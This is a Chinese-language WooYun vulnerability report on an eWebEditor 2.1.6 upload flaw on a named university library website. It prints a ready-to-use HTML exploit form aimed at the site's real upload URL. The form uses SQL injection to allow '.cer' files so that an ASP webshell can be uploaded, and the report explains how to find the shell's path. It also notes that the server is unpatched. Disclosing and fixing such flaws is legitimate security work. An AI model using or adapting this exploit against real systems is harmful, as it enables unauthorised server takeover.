当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130590

漏洞标题:内蒙古工业大学图书馆网站ewebeditor上传漏洞

相关厂商:内蒙古工业大学

漏洞作者: 班尼路

提交时间:2015-07-31 11:21

修复时间:2015-08-05 11:22

公开时间:2015-08-05 11:22

漏洞类型:文件上传导致任意代码执行

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

内蒙古工业大学图书馆网站存在ewebeditor编辑器上传漏洞 可getshell

详细说明:

查看ewebeditor编辑器版本

http://www.lib.imut.edu.cn/admin/ewebeditor/dialog/about.htm


eweb ver.jpg


使用的是ewebeditor编辑器2.1.6版本,此版本存在上传漏洞,无需登录编辑器管理后台,增加样式,利用公开的exp代码,修改相关参数并上传一个cer脚本木马,即可获取webshell。
exp代码如下

<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br> 
<form action="http://www.lib.imut.edu.cn/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>


将代码保存为html格式文件,选择一个cer脚本木马上传,上传成功后,通过右键查看源代码获得脚本木马路径。

asp.jpg


上传的马仅为测试,测试完已将删除。
网站服务器操作系统为Windows Server 2008 R2 未打过补丁

漏洞证明:

asp.jpg

修复方案:

升级ewebeditor编辑器到最新版本,为Windows Server 2008 R2及时打全补丁。

版权声明:转载请注明来源 班尼路@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-05 11:22

厂商回复:

最新状态:

暂无